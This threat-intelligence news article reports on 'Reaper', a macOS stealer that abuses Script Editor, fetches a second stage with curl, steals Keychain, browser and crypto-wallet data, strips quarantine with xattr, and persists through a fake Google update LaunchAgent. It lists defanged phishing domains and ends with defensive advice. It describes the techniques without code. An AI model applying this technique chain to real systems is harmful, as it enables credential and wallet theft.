The Script Editor Trap: New macOS “Reaper” Malware Bypasses Terminal Defenses to Steal Keychains

A novel exploitation technique has surfaced on macOS, designed to deceive users via a counterfeit “security update.” The malicious payload, designated as Reaper—an advanced iteration of the SHub information stealer—no longer relies on social engineering to coerce victims into pasting commands into the Terminal. Instead, it seamlessly launches Apple’s native Script Editor, pre-loaded with weaponized code.

Threat intelligence researchers at SentinelOne report that Reaper systematically exfiltrates browser telemetry, scans for documents containing sensitive financial intelligence, compromises cryptocurrency wallets, and establishes a clandestine backdoor into the infected host. The malware weaponizes the applescript:// URI scheme to invoke the macOS Script Editor, presenting the user with an AppleScript payload. Should the victim execute the script by clicking “Run,” the program generates a fraudulent Apple update prompt, fetches a secondary malicious script via curl, and executes it through the zsh shell.

This sophisticated maneuver successfully circumvents the defensive mitigations Apple introduced in late March within macOS Tahoe 26.4. While that update effectively hindered the pasting and execution of potentially hazardous commands within the Terminal, Reaper elegantly pivots the attack vector toward a different, inherently trusted system utility.

Victims were lured using trojanized installers for WeChat and Miro, hosted on meticulously crafted phishing domains. The identified infrastructure included qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, and mlroweb[.]com. These deceptive web portals proactively fingerprinted the visitor’s endpoint, scanning for hypervisor artifacts or active VPN connections, while simultaneously enumerating browser extensions related to password managers and cryptocurrency wallets. The harvested telemetry was subsequently exfiltrated to the threat actors via a dedicated Telegram bot.

Prior to initiating data exfiltration, Reaper conducts an environmental check to determine if the victim is utilizing a Russian keyboard layout. Upon a positive match, the malware dispatches a cis_blocked event to the Command and Control (C2) server and gracefully terminates its execution, leaving the system pristine and uninfected.

Should the host pass this geofencing validation, Reaper prompts the user for their core macOS credential. Securing this password unlocks access to the Keychain, locally cached credentials, and cryptographically protected files. Subsequently, the malware pillages telemetry from an exhaustive array of browsers—including Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Opera, Vivaldi, Arc, and Orion—and aggressively targets extensions such as MetaMask, Phantom, 1Password, Bitwarden, and LastPass. It further compromises desktop cryptocurrency wallets, notably Exodus, Atomic Wallet, Ledger Live, Electrum, and Trezor Suite. Additionally, Reaper attempts to harvest iCloud synchronization data, active Telegram session tokens, and proprietary configuration files associated with software development environments.

A discrete Filegrabber module is deployed to scour the Desktop and Documents directories for assets potentially harboring confidential intelligence. The malware is calibrated to exfiltrate standard files up to 2 MB in size, and PNG image assets up to 6 MB, enforcing a hard cap of 150 MB on the total volume of stolen data to minimize network noise.

Upon detecting active cryptocurrency wallet applications, Reaper forcefully terminates their running processes and overwrites the primary application core with a malicious app.asar payload retrieved from the C2 infrastructure. To preempt and neutralize macOS Gatekeeper security alerts, Reaper strips the quarantine extended attributes via the xattr -cr command and cryptographically resigns the tampered application using an ad-hoc signature.

Furthermore, Reaper establishes robust persistence mechanisms within the host environment. The malware installs a script meticulously camouflaged as a benign Google software update and registers it via a LaunchAgent. This daemon executes at one-minute intervals, transmitting system telemetry back to the C2 server and standing by to ingest secondary payloads. Following execution, the initial malicious artifact is securely erased, granting the adversaries prolonged, deeply obfuscated access to the compromised endpoint.

SentinelOne analysts issue a stark warning that the architects behind SHub are actively augmenting the stealer’s capabilities, evolving it into a fully functional Remote Access Trojan (RAT). Network defenders and system administrators are strongly advised to monitor for anomalous outbound traffic following the invocation of the Script Editor, and to rigorously audit the deployment of novel LaunchAgents alongside files masquerading as components from trusted, verified vendors.